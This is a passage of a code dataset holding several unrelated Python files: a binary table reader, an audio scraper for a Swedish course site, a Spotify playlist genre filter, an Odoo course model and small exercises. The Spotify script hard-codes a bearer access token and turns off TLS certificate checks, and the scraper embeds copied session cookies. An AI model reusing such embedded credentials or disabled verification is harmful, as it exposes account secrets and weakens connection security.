tarfile.open(saveto, mode=mode)\n tar.add(self.path)\n tar.close()\n\n def get_info(self) -> pandas.DataFrame:\n \"\"\"Get metadata of all tables in the database.\"\"\"\n names = self.list_tables()\n\n dictlist = []\n for name in names:\n table = self.open_table(name)\n dic = {\n \"table name\": name,\n \"file size [byte]\": table.stat.st_size,\n \"#records\": table.nrecords,\n \"record size [byte]\": table.record_size,\n \"format\": table.format,\n }\n dictlist.append(dic)\n table.close()\n\n df = pandas.DataFrame(\n dictlist,\n columns=[\n \"table name\",\n \"file size [byte]\",\n \"#records\",\n \"record size [byte]\",\n \"format\",\n ],\n ).set_index(\"table name\")\n\n return df\n\n\nclass table:\n \"\"\"Data table for single topic.\n\n Parameters\n ----------\n dbpath: pathlib.Path\n Path to database directory, the direct parent of *.data and *.header files.\n name: str\n Name of table.\n mode: str\n Mode in which the database is opened (e.g. [\"rb\", \"wb\", ...]).\n endian: str\n One of [\"=\", \"<\", \">\"].\n\n Notes\n -----\n Endian specifications [\"@\", \"!\"] are not supported, since numpy doesn't recognize\n them. 
Though [\"=\"] is supported, the use of it is deprecated since the behavior may\n vary between architectures this program runs on.\n\n \"\"\"\n\n dbpath = \"\"\n data_file = None\n header = {}\n record_size = 0\n format = \"\"\n stat = None\n nrecords = 0\n endian = \"\"\n\n def __init__(\n self, dbpath: pathlib.Path, name: str, mode: str, endian: str = \"<\"\n ) -> None:\n self.dbpath = dbpath\n self.endian = endian\n self.open(name, mode)\n\n self._name = name\n self._mode = mode\n\n def open(self, table_name: str, mode: str) -> None:\n \"\"\"Open a data table of specified topic.\"\"\"\n data_path = self.dbpath / (table_name + \".data\")\n header_path = self.dbpath / (table_name + \".header\")\n\n if not (data_path.exists() and header_path.exists()):\n raise Exception(f\"Table '{table_name}' does not exist.\")\n\n self.data_file = data_path.open(mode)\n with header_path.open(\"r\") as header_file:\n self.header = json.load(header_file)\n\n format_list = [dat[\"format\"] for dat in self.header[\"data\"]]\n self.format = self.endian + \"\".join(format_list)\n self.record_size = struct.calcsize(self.format)\n self.stat = data_path.stat()\n self.nrecords = self.stat.st_size // self.record_size\n\n if self.header.get(\"struct_indices\", False) is False:\n # Infer sizes\n struct_sizes = utils.get_struct_sizes(format_list, self.endian)\n for dat, size in zip(self.header[\"data\"], struct_sizes):\n dat[\"size\"] = size\n self.header[\"struct_indices\"] = True\n\n def close(self) -> None:\n \"\"\"Close the data file of the table.\"\"\"\n self.data_file.close()\n\n def append(self, *data: Any) -> None:\n \"\"\"Append data to the table.\"\"\"\n self.data_file.write(struct.pack(self.format, *data))\n\n def read(\n self, num: int = -1, start: int = 0, cols: List[str] = [], astype: str = \"tuple\"\n ) -> Union[tuple, dict, numpy.ndarray, pandas.DataFrame, bytes]:\n \"\"\"Read the contents of the table.\n\n Parameters\n ----------\n num: int\n Number of records to be read.\n start: int\n Index of first record to be read.\n cols: list of str\n Names of the fields to be picked up (e.g. \"timestamp\").\n astype: str\n One of [\"tuple\", \"dict\", \"structuredarray\", \"dataframe\", \"buffer\"] or their\n aliases, [\"structured_array\", \"array\", \"sa\", \"data_frame\", \"pandas\", \"df\",\n \"raw\"].\n\n \"\"\"\n mm = mmap.mmap(self.data_file.fileno(), 0, prot=mmap.PROT_READ)\n mm.seek(start * self.record_size)\n\n if cols == []:\n data = self._read_all_cols(mm, num)\n else:\n if isinstance(cols, str):\n raise ValueError(\"Column names should be given as list of str.\")\n data = self._read_specified_cols(mm, num, cols)\n\n mm.close()\n return self._astype(data, cols, astype)\n\n def _read_all_cols(self, mm: mmap.mmap, num: int) -> bytes:\n \"\"\"Read all columns of the data table.\"\"\"\n if num == -1:\n size = num\n else:\n size = num * self.record_size\n return mm.read(size)\n\n def _read_specified_cols(\n self, mm: mmap.mmap, num: int, cols: List[Dict[str, str]]\n ) -> bytes:\n \"\"\"Read specified columns of the data table.\n\n Notes\n -----\n The byte count of this function may contain bugs. 
For data which are not\n aligned, the count would be correct, but byte count for aligned data is much\n difficult, hence the implementation may not be perfect.\n One resolution for this problem would be to read all columns, then drop\n unnecessary columns.\n\n \"\"\"\n commands = []\n for _col in self.header[\"data\"]:\n elemsize = struct.calcsize(_col[\"format\"])\n if _col[\"key\"] in cols:\n commands.append({\"cmd\": \"read\", \"size\": elemsize})\n commands.append({\"cmd\": \"seek\", \"size\": _col[\"size\"] - elemsize})\n else:\n commands.append({\"cmd\": \"seek\", \"size\": _col[\"size\"]})\n\n if num == -1:\n num = (mm.size() - mm.tell()) // self.record_size\n\n draw = b\"\"\n for _ in range(num):\n for _cmd in commands:\n if _cmd[\"cmd\"] == \"seek\":\n mm.seek(_cmd[\"size\"], os.SEEK_CUR)\n else:\n draw += mm.read(_cmd[\"size\"])\n return draw\n\n def _astype(\n self, data: bytes, cols: List[Dict[str, Any]], astype: str\n ) -> Union[tuple, dict, numpy.ndarray, pandas.DataFrame, bytes]:\n \"\"\"Map the astype argument to corresponding methods.\"\"\"\n if cols == []:\n cols = self.header[\"data\"]\n else:\n cols = [_col for _col in self.header[\"data\"] if _col[\"key\"] in cols]\n\n def DataFormatError(e: Union[Exception, str] = \"\"):\n return ValueError(\n str(e) + \"\\nThis may caused by wrong specification of data format.\"\n \"Try ``db.open_table(table_name).recovered.read()`` instead of\"\n \"``db.open_table(table_name).read()``.\"\n )\n\n if astype in [\"tuple\"]:\n try:\n return self._astype_tuple(data, cols)\n except struct.error as e:\n raise DataFormatError(e)\n\n elif astype in [\"dict\"]:\n try:\n return self._astype_dict(data, cols)\n except struct.error as e:\n raise DataFormatError(e)\n\n elif astype in [\"structuredarray\", \"structured_array\", \"array\", \"sa\"]:\n try:\n return self._astype_structured_array(data, cols)\n except ValueError as e:\n raise DataFormatError(e)\n\n elif astype in [\"dataframe\", \"data_frame\", \"pandas\", \"df\"]:\n try:\n return self._astype_data_frame(data, cols)\n except struct.error as e:\n raise DataFormatError(e)\n\n elif astype in [\"buffer\", \"raw\"]:\n return data\n\n else:\n raise ValueError(f\"Unknown return type {astype}.\")\n\n def _astype_tuple(\n self, data: bytes, cols: List[Dict[str, Any]]\n ) -> Tuple[Tuple[Any]]:\n \"\"\"Read the data as tuple of tuple.\"\"\"\n fmt = self.endian + \"\".join([col[\"format\"] for col in cols])\n return tuple(struct.iter_unpack(fmt, data))\n\n def _astype_dict(\n self, data: bytes, cols: List[Dict[str, Any]]\n ) -> List[Dict[str, Any]]:\n \"\"\"Read the data as list of dict.\"\"\"\n offset = 0\n dictlist = []\n while offset < len(data):\n dict_ = {}\n\n for col in cols:\n size = struct.calcsize(col[\"format\"])\n if \"x\" in col[\"format\"]: # Pad field\n offset += col[\"size\"]\n continue\n dat = struct.unpack(col[\"format\"], data[offset : offset + size])\n if len(dat) == 1:\n (dat,) = dat\n\n dict_[col[\"key\"]] = dat\n offset += col[\"size\"]\n\n dictlist.append(dict_)\n\n return dictlist\n\n def _astype_data_frame(\n self, data: bytes, cols: List[Dict[str, Any]]\n ) -> pandas.DataFrame:\n \"\"\"Read the data as pandas.DataFrame.\"\"\"\n data = self._astype_dict(data, cols)\n return pandas.DataFrame.from_dict(data)\n\n def _astype_structured_array(\n self, data: bytes, cols: List[Dict[str, Any]]\n ) -> numpy.ndarray:\n \"\"\"Read the data as numpy's structured array.\"\"\"\n formats = [col[\"format\"] for col in cols]\n\n def parse_dtype(format_character: str) -> str:\n def 
str_format(length: Union[str, int], count: Union[str, int]):\n                count = count if int(count) > 1 else \"\"\n                return f\"{count}S{length}\"\n\n            format_character = re.sub(\n                r\"^([\\d+s]+)$\",\n                lambda m: str_format(m.group(1).split(\"s\")[0], m.group(1).count(\"s\")),\n                format_character,\n            )\n\n            format_character = format_character.replace(\"x\", \"V\")\n            return self.endian + format_character\n\n        np_formats = [parse_dtype(col[\"format\"]) for col in cols]\n        keys = [col[\"key\"] for col in cols]\n        offsets = utils.get_struct_indices(formats, self.endian)[:-1]\n\n        pad = [\"x\" in col[\"format\"] for col in cols]\n        data_field = [k for k, p in zip(keys, pad) if not p]\n\n        dtype = numpy.dtype({\"names\": keys, \"formats\": np_formats, \"offsets\": offsets})\n        return numpy.frombuffer(data, dtype=dtype)[data_field]\n\n    @property\n    def recovered(self) -> \"table\":\n        \"\"\"Restore the broken data caused by bugs in logger.\n\n        Examples\n        --------\n        >>> db = necstdb.opendb(\"path/to/db\")\n        >>> data = db.open_table(\"topic_name\").recovered.read(astype=\"array\")\n        array([...])\n\n        Notes\n        -----\n        The details of the bugs are:\n        - bool data are dumped as bool, but the formatting character in the header was\n          int32's\n        When other bug is found, this property should determine what the problem is,\n        based on the value of the data (e.g. timestamp contains extremely small number\n        such as 1e-308)\n\n        \"\"\"\n        return recover(self)\n\n\ndef opendb(path: os.PathLike, mode: str = \"r\") -> \"necstdb\":\n    \"\"\"Quick alias to open a database.\n\n    Parameters\n    ----------\n    path: PathLike\n        Path to the database directory, the direct parent of *.data and *.header files.\n    mode: str\n        Mode in which the database is opened (e.g. [\"rb\", \"wb\", ...]).\n\n    \"\"\"\n    return necstdb(path, mode)\n\n\ndef relog(db: necstdb, starttime: float, endtime: float):\n    \"\"\"Create time-subtracted necstdb.\n\n    Parameters\n    ----------\n    db: necstdb\n        Original necstdb to be subtracted\n    starttime: float\n        Start subtraction from this time\n    endtime: float\n        End subtraction from this time\n\n    \"\"\"\n    newdb = opendb(db.path.stem + \"_extracted\", mode=\"w\")\n\n    for name in db.list_tables():\n        print(name)\n        table = db.open_table(name)\n        data = table.read(astype=\"df\")\n        timestamp_key = \"time\"\n        t = data[timestamp_key].astype(float)\n        idx = t[(starttime <= t) & (t <= endtime)].index\n        extracted_data = data.iloc[idx]\n\n        header = table.header\n        header.pop(\"struct_indices\")\n        newdb.create_table(name, header)\n        newtable = newdb.open_table(name, \"wb\")\n\n        for row in extracted_data.itertuples(index=False):\n            _data = utils.flatten_data(list(row))\n            newtable.append(*_data)\n\n        newtable.close()\n    # save_file() takes positional (name, data, info) arguments\n    newdb.save_file(db.path.stem + \"_extracted\", \"subtracted database\")\n","sub_path":"necstdb/necstdb.py","file_name":"necstdb.py","file_ext":"py","file_size_in_byte":17692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"269592488","text":"import os\nfrom pathlib import Path\nimport requests\nfrom bs4 import BeautifulSoup\nimport eyed3\nimport re\nimport shutil\n\ncookies = {\n    '_ga': 'GA1.2.2117970736.1586416913',\n    '_gid': 'GA1.2.966114317.1586416913',\n    '_fbp': 'fb.1.1586416913469.1269885241',\n    'cookieconsentaccepted': 'true',\n    'JSESSIONID': '11571505CF3168014925715D03D05F36',\n    'COOKIE_SUPPORT': 'true',\n    'LFR_SESSION_STATE_3907749': '1586455036919',\n    'GUEST_LANGUAGE_ID': 'en_US',\n    'LFR_SESSION_STATE_20120': '1586453838446',\n    '_gat': '1',\n}\n\nheaders = {\n    'User-Agent': 'Mozilla/5.0 
(X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0',\n    'Accept': 'audio/webm,audio/ogg,audio/wav,audio/*;q=0.9,application/ogg;q=0.7,video/*;q=0.6,*/*;q=0.5',\n    'Accept-Language': 'en-US,en;q=0.5',\n    'Range': 'bytes=0-',\n    'Connection': 'keep-alive',\n    'Referer': 'https://digital.nok.se/web/site-709522/state-jurdcojshera/page-710868',\n    'TE': 'Trailers',\n}\n\ntracks = None\nparams = None\nparsed_html = None\nkapitel_name = None\nkapitel_folder = None\nbooks = [('A1_A2', 20), ('B1_B2', 18), ('B2_C1', 12)]\n# books = [('A1_A2', 1)]\nHTML_ROOT = Path('HTML')\nMP3_ROOT = Path('mp3')\n\n\ndef get_and_save_sound_files(request_params, file_name):\n    response = requests.get('https://digital.nok.se/o/blob-download',\n                            headers=headers, params=request_params, cookies=cookies)\n    with open(file_name, 'wb') as file:\n        file.write(response.content)\n\n\ndef parse_html_page(html_page):\n    global parsed_html\n    file_name = os.path.join(os.getcwd(), html_page)\n    with open(file_name) as html_file:\n        html = html_file.read()\n    parsed_html = BeautifulSoup(html, features=\"html.parser\")\n\n\ndef find_kapitel_name():\n    global kapitel_name\n    for element in parsed_html.find_all('span', attrs={'class': 'nok-breadcrumb'}):\n        kapitel_name = element.string.strip()\n\n\ndef find_tracks():\n    global tracks\n    tracks = []\n    for element in parsed_html.find_all('div', attrs={'class': 'cloubi-library-media-metadatadisplay-content'}):\n        content = element.string\n        if content.find(\"mp3\") > 0:\n            # print(content.strip())\n            # the saved pages are mis-encoded, so 'Spår' arrives as 'SpÃ¥r'\n            tracks.append(content.strip().replace(\"SpÃ¥r\", \"Track\"))\n\n\ndef find_blobs_and_tokens():\n    global params\n    params = []\n    for element in parsed_html.find_all('source'):\n        # print(element['src'])\n        src = element['src']\n        blob = src[src.find(\"=\") + 1:src.find(\"&\")]\n        # print(blob)\n        token = src[src.find(\"token=\") + 6:]\n        # print(token)\n        params.append(\n            (\n                ('blob', blob),\n                ('token', token),\n            )\n\n        )\n\n\ndef create_kapitel_folder(book):\n    global kapitel_folder\n    book_folder = os.path.join(MP3_ROOT, 'Rivstart_' + book)\n    if not os.path.isdir(book_folder):\n        os.mkdir(book_folder)\n    kapitel_folder = os.path.join(book_folder, kapitel_name)\n    print(kapitel_folder)\n    if not os.path.isdir(kapitel_folder):\n        os.mkdir(kapitel_folder)\n\n\ndef process_tracks(book, kapitel):\n    for i in range(len(tracks)):\n        # find_tracks() renamed the entries to \"Track NN.mp3\", so strip the\n        # \"Track \" prefix and the literal \".mp3\" suffix to get the number\n        tracknum = re.sub(r\"Track |\\.mp3\", \"\", tracks[i])\n        print(tracknum)\n        # print(tracks[i])\n        file_name = os.path.join(kapitel_folder, tracks[i])\n        get_and_save_sound_files(params[i], file_name)\n        add_tags(book, kapitel, file_name, tracknum)\n        save_file_to_root(book, kapitel, file_name, tracknum)\n\n\ndef save_file_to_root(book, kapitel, file_name, tracknum):\n    # copy the tagged track into the mp3 root under its canonical name\n    # (assumed intent of this helper)\n    final_file = os.path.join(MP3_ROOT, f\"{book}K{kapitel}T{tracknum}.mp3\")\n    shutil.copyfile(file_name, final_file)\n\n\ndef add_tags(book, kapitel, file_name, tracknum):\n    # audiofile = eyed3.load('{book}_{kapitel}_{track}.mp3')\n    audiofile = eyed3.load(file_name)\n    audiofile.tag.artist = f\"Sueco{book}\"\n    audiofile.tag.album = f\"{book}K{kapitel}\"\n    audiofile.tag.title = f\"{book}K{kapitel}T{tracknum}\"\n    audiofile.tag.track_num = int(tracknum)  # eyed3 expects a number here\n\n    audiofile.tag.save()\n\n\ndef process_html_page(html_page, book, kapitel):\n    parse_html_page(html_page)\n    find_kapitel_name()\n    find_tracks()\n    find_blobs_and_tokens()\n    create_kapitel_folder(book)\n    process_tracks(book, kapitel)\n\n\ndef main():\n    html_page = os.path.join(HTML_ROOT, 'Rivstart_{book}_Kap{kapitel}.html')\n    for book in books:\n        
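# each entry of books is a (book_name, chapter_count) pair, e.g. ('A1_A2', 20)\n        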
print(\"book\", book)\n for i in range(1, book[1] + 1):\n print(\"chapter\", i)\n process_html_page(html_page.format(book=book[0], kapitel=str(i)), book[0], str(i))\n","sub_path":"src/ripstart/html_parser.py","file_name":"html_parser.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"592443832","text":"# Default Imports\nfrom greyatomlib.python_getting_started.q01_read_data.build import read_data\ndata = read_data()\n\n# Your Solution\ndef bowled_out(data=data):\n\n deliv=data['innings'][1]['2nd innings']['deliveries']\n # Write your code here\n d=list()\n bowled_players = list()\n d=list()\n count = 0\n for i in range(len(deliv)):\n d.append(deliv[i].items()[0][0])\n\n for i in range(len(deliv)):\n temp = d[i]\n if(deliv[i][temp].has_key('wicket')):\n if (deliv[i][temp]['wicket']['kind'] == 'bowled'):\n bowled_players.append(deliv[i][temp]['wicket']['player_out'])\n\n return bowled_players\n","sub_path":"q06_bowled_players/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"266933580","text":"#-------------------------------------------------------------------------------\n#\n# Project: EOxServer \n# Authors: Stephan Krause \n# Stephan Meissl \n# Martin Paces \n#\n#-------------------------------------------------------------------------------\n# Copyright (C) 2011 EOX IT Services GmbH\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell \n# copies of the Software, and to permit persons to whom the Software is \n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies of this Software or works derived from this Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#-------------------------------------------------------------------------------\n\nfrom eoxserver.resources.coverages.exceptions import ManagerError\n\n#-------------------------------------------------------------------------------\n\nfrom eoxserver.resources.coverages.managers.coverage import CoverageManager\nfrom eoxserver.resources.coverages.managers.coverage import CoverageManagerDatasetMixIn\nfrom eoxserver.resources.coverages.managers.coverage import CoverageManagerEOMixIn\n\n#-------------------------------------------------------------------------------\n\nclass EODatasetManager(CoverageManager, CoverageManagerDatasetMixIn, CoverageManagerEOMixIn):\n def _create(self, coverage_id, **kwargs):\n location = self._get_location(kwargs)\n \n metadata_location = self._get_metadata_location(location, kwargs)\n \n data_package = self._create_data_package(\n location, metadata_location\n )\n \n existing_coverage = self._get_existing_coverage(data_package)\n \n if existing_coverage:\n \n if self._validate_type(existing_coverage):\n return existing_coverage\n else:\n raise ManagerError(\n \"Another coverage with different type, but the same data exists already.\"\n )\n \n else:\n \n geo_metadata = self._get_geo_metadata(data_package, kwargs)\n \n range_type_name = self._get_range_type_name(kwargs)\n \n layer_metadata = self._get_layer_metadata(kwargs)\n \n eo_metadata = self._get_eo_metadata(data_package, kwargs)\n \n data_source = kwargs.get(\"data_source\")\n \n containers = self._get_containers(kwargs)\n \n visible = kwargs.get(\"visible\", True)\n \n return self._create_coverage(\n coverage_id,\n data_package,\n data_source,\n geo_metadata,\n range_type_name,\n layer_metadata,\n eo_metadata,\n container=kwargs.get(\"container\"),\n containers=containers,\n visible=visible\n )\n \n \n def _prepare_update_dicts(self, link_kwargs, unlink_kwargs, set_kwargs):\n super(EODatasetManager, self)._prepare_update_dicts(link_kwargs, unlink_kwargs, set_kwargs) \n \n link_kwargs[\"containers\"] = self._get_containers(link_kwargs)\n unlink_kwargs[\"containers\"] = self._get_containers(unlink_kwargs)\n\n#-------------------------------------------------------------------------------\n","sub_path":"eoxserver/resources/coverages/managers/eo_ds.py","file_name":"eo_ds.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"42071214","text":"__author__ = 'bdm4, James Allsup'\n\n\nimport requests, json\nimport subprocess\nimport sys\nimport csv\nimport urllib3\nimport sys\nfrom time import sleep\nfrom datetime import datetime\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n\n#This script:\n# 1) Retrieves tracks and associated genres from a playlist\n# 2) Filters out tracks by genre\n# 3) Sorts the tracks by release date ascending\n# 4) Adds the remaining tracks to a new playlist\n\n# INSTRUCTIONS:\n# 1) Add valid access_token\n# 2) Add search playlist and target playlist fields\n# 3) Add genre to filter on\naccess_token = 
'BQCd23LMG-J5Nrh6DdEnc7P2_8zvm-exsM4WJWk5_Eqg6cAW02Ex8jsjjhLvqAve9oLaOc7-fiT1QYEHUnH2FOil_9DpkTLwszcXh90aAPKoDB9hrPuwNn3SasUyzKWXS8Q3InohT4gVD7Th6YbDAjbJTybYLaXRyX0A5tMQ8UQe_dINlzawJmKSoEgTcQ4nKs0'\n\nsearch_playlist_id = '4wYwzTatuFG1G5Mm6QxDf6'\npopulate_playlist_id = '67tq6cEqQ2zBdt1Y2HkHUO'\nsearch = 'pop'\n\napi_call_headers = {'Authorization': 'Bearer ' + access_token}\n\n#get track info and artist ids\ntotal_tracks = 3248\ntrack_it = 0\ndata = {}\ndata['tracks'] = []\nx=0\n#max is 100\nlimit=100\nwhile x<30:\n offset=str(x*limit)\n getPlaylistItems = \"https://api.spotify.com/v1/playlists/\" + search_playlist_id + \"/tracks?fields=items(track.artists(id),track.name,track.id,track.album.release_date)&limit=\" + str(limit) + \"&offset=\" + offset\n\n api_call_response = requests.get(getPlaylistItems, headers=api_call_headers, verify=False)\n if api_call_response.status_code != 200:\n print(api_call_response)\n sys.exit(\"API Request Error\")\n json_data = json.loads(api_call_response.text)\n\n for item in json_data['items']:\n trackName=item['track']['name']\n trackID=item['track']['id']\n artistID=item['track']['artists'][0]['id']\n #standardize release date formats\n if len(item['track']['album']['release_date'])==4:\n release_date = int(item['track']['album']['release_date'] + \"0101\")\n if len(item['track']['album']['release_date'])==7:\n release_date = int(item['track']['album']['release_date'][:4] + \"0101\")\n if len(item['track']['album']['release_date'])>7:\n release_date = int(item['track']['album']['release_date'][:4] + item['track']['album']['release_date'][5:7] + item['track']['album']['release_date'][8:10])\n #releaseDate=item['track']['album']['release_date']\n data['tracks'].append({\n 'trackName': trackName,\n 'trackID': trackID,\n 'artistID': artistID,\n 'releaseDate': release_date\n })\n print(\"Track \" + str(track_it) + \"/\" + str(total_tracks))\n track_it+=1\n x+=1\n\n#build artist/genre dataset\n#artist limit max is 50\nartist_limit=50\nartist_count=0\nprogress_count=0\nartist_data = {}\nartist_data['artists'] = []\ngetPlaylistItems=\"https://api.spotify.com/v1/artists?ids=\"\n\nfor track in data['tracks']:\n if artist_count==0:\n getPlaylistItems += track['artistID']\n artist_count+=1\n progress_count+=1\n print(\"Genre \" + str(progress_count) + \"/\" + str(total_tracks))\n\n elif artist_count0:\n filteredData['tracks'].append({\n 'trackID': track['trackID'],\n 'releaseDate': track['releaseDate']\n })\nif len(filteredData['tracks'])==0:\n sys.exit(\"No Tracks Found\")\nelse:\n print(str(len(filteredData['tracks'])) + \" tracks found\" )\n\n\n\n#sort by release datetime\n#sortedFilteredData = sorted(filteredData['tracks'], key=lambda x: datetime.strptime(x['releaseDate'], '%Y-%m-%d'))\nsortedFilteredData = sorted(filteredData['tracks'], key = lambda x:x[\"releaseDate\"])\nprint(sortedFilteredData)\n\n#create playlist\ncountlimit=0\ntracklist={}\ntracklist['uris'] = []\nuristring=\"\"\nfor track in sortedFilteredData:\n ##limit is 100\n if countlimit <90:\n uristring+= \"spotify:track:\" + track['trackID']\n tracklist['uris'].append(uristring)\n uristring=\"\"\n countlimit+=1\n else:\n getPlaylistItems = \"https://api.spotify.com/v1/playlists/\" + populate_playlist_id + \"/tracks\"\n api_call_response = requests.post(getPlaylistItems, data=json.dumps(tracklist), headers=api_call_headers, verify=False)\n if api_call_response.status_code != 201:\n print(\"API Request Error\")\n tracklist={}\n tracklist['uris'] = []\n uristring+= \"spotify:track:\" + 
track['trackID']\n        tracklist['uris'].append(uristring)\n        uristring=\"\"\n        countlimit=1\n        continue\n\ngetPlaylistItems = \"https://api.spotify.com/v1/playlists/\" + populate_playlist_id + \"/tracks\"\napi_call_response = requests.post(getPlaylistItems, data=json.dumps(tracklist), headers=api_call_headers, verify=False)\nif api_call_response.status_code != 201:\n    print(\"API Request Error\")\n","sub_path":"filterplaylistbygenre.py","file_name":"filterplaylistbygenre.py","file_ext":"py","file_size_in_byte":6450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"479160124","text":"# Baekjoon 11722: longest decreasing subsequence\n# DP\nimport sys\ninput = sys.stdin.readline\nn = int(input())\ndp = [1 for _ in range(n)]\na = list(map(int, input().split()))\n\nfor i in range(n):\n    for j in range(i):\n        if a[i] < a[j]: # the earlier value is larger, so extend the decreasing run by 1\n            dp[i] = max(dp[i], dp[j] + 1)\nprint(max(dp))\n\n","sub_path":"11722.py","file_name":"11722.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"4520930","text":"from django.conf import settings\nfrom importlib import import_module\n\n\nclass GlitterApp(object):\n    \"\"\"\n    A simple class to store Glitter App config options.\n    \"\"\"\n    def __init__(self, name, url_conf, namespace=None):\n        self.name = name\n        self.url_conf = url_conf\n        self.namespace = namespace\n\n    def __str__(self):\n        return self.name\n\n\nclass GlitterAppPool(object):\n    \"\"\"\n    An interface to the Glitter App configs in the current project.\n\n    Will lazily discover Glitter App configs when needed.\n    \"\"\"\n    def __init__(self):\n        self.glitter_apps = {}\n        self.discovered = False\n\n    def get_glitter_app(self, glitter_app_name):\n        \"\"\"\n        Retrieve the Glitter App config for a specific Glitter App.\n        \"\"\"\n        if not self.discovered:\n            self.discover_glitter_apps()\n\n        try:\n            glitter_app = self.glitter_apps[glitter_app_name]\n            return glitter_app\n        except KeyError:\n            return None\n\n    def discover_glitter_apps(self):\n        \"\"\"\n        Find all the Glitter App configurations in the current project.\n        \"\"\"\n        for app_name in settings.INSTALLED_APPS:\n            module_name = '{app_name}.glitter_apps'.format(app_name=app_name)\n            try:\n                glitter_apps_module = import_module(module_name)\n                if hasattr(glitter_apps_module, 'apps'):\n                    self.glitter_apps.update(glitter_apps_module.apps)\n            except ImportError:\n                pass\n\n        self.discovered = True\n\n    def get_glitter_apps(self):\n        if not self.discovered:\n            self.discover_glitter_apps()\n        return self.glitter_apps\n\n\nglitter_app_pool = GlitterAppPool()\n","sub_path":"glitter/integration.py","file_name":"integration.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"401720704","text":"# _*_ coding: utf-8 _*_\nfrom odoo import models, fields, api, _\n\nclass Curriculum(models.Model):\n    _name = 'curriculum'\n    _rec_name = 'date'\n\n    name = fields.Char(string='課程', related='batch_id.name')\n    batch_id = fields.Many2one('jt.batch', '班級名稱')\n    date = fields.Date(string='日期')\n    class_time = fields.Text(string='上課時間')\n    course_line_id = fields.Many2one('jt.course.line', string='級數')\n    teacher = fields.Many2one(comodel_name='jt.teacher', string='講師')\n    class_room = fields.Many2one(comodel_name='jptip.class.room', string='教室')\n    details = fields.One2many('curriculum.line', 'curriculum_id', string='班級課表')\n    state = fields.Selection(selection=[('1', '未建立課堂點名'), ('2', 
'已建立課堂點名')], default='1', string='狀態')\n event_batch = fields.Boolean(string='活動課程', track_visibility='onchange')\n company_id = fields.Many2one('res.company', '分校')\n attendance_ids = fields.One2many('jt.attendance','curriculum_id')\n count_attendance_ids = fields.Integer(compute='_compute_attendance_count')\n morning = fields.Boolean(string='上午')\n afternoon = fields.Boolean(string='下午')\n night = fields.Boolean(string='晚間')\n\n def open_attendance_list(self):\n action = self.env.ref('jptip_core.attendance_view_action').read()[0]\n action['domain'] = [('curriculum_id', '=', self.id)]\n return action\n\n def _compute_attendance_count(self):\n for line in self:\n line.count_attendance_ids = len(line.attendance_ids)\n\n def roll_call(self):\n for line in self.details:\n attendance_id = self.env['jt.attendance'].create({\n 'batch_id': line.batch_id.id,\n 'timetable_id': line.timetable_id.id,\n 'company_id': line.company_id.id,\n 'curriculum_id': self.id,\n 'course_line_id': self.course_line_id.id,\n })\n lines = attendance_id.exam_lines()\n attendance_id.write({\n 'lines_id': [(6, 0, lines)]\n })\n self.state = '2'\n\nclass CurriculumLine(models.Model):\n _name = 'curriculum.line'\n\n curriculum_id = fields.Many2one(comodel_name='curriculum', string='課堂資訊')\n batch_id = fields.Many2one('jt.batch', '課程')\n timetable_id = fields.Many2one('class.timetable', '課堂')\n start_time = fields.Many2one('jt.time.session.manager', related='timetable_id.class_time_begin', store=True)\n company_id = fields.Many2one('res.company', '分校')","sub_path":"addons_jptip/jptip_core/models/curriculum.py","file_name":"curriculum.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"153317382","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 5 19:32:05 2017\n\n@author: Caiyd\n\"\"\"\n\nimport numpy as np\nimport fire\n\ndef main(infile, outfile):\n name_list = []\n snp_ay = []\n with open(infile) as f:\n header = next(f)\n for line in f:\n line = line.strip().split()\n name_list.append(line[0])\n snp_ay.append(list(line[1]))\n snp_ay = np.array(snp_ay).T\n snp_ay = snp_ay[np.sum(snp_ay != 'N', axis=1) >= 2].T\n snp_ay[snp_ay == 'N'] == '-'\n with open(outfile, 'w') as f:\n f.write(header.split()[0] + '\\t')\n f.write('%s\\n' % snp_ay.shape[1])\n for name, snp in zip(name_list, snp_ay):\n f.write(\"{name: <30}\\t\".format(name=name))\n f.write(\"\".join(snp) + '\\n')\n\n\nif __name__ == '__main__':\n fire.Fire(main)\n\n","sub_path":"snp_tools/phylip_trim.py","file_name":"phylip_trim.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"190350122","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nimport datetime as dt\n\n\nstart = 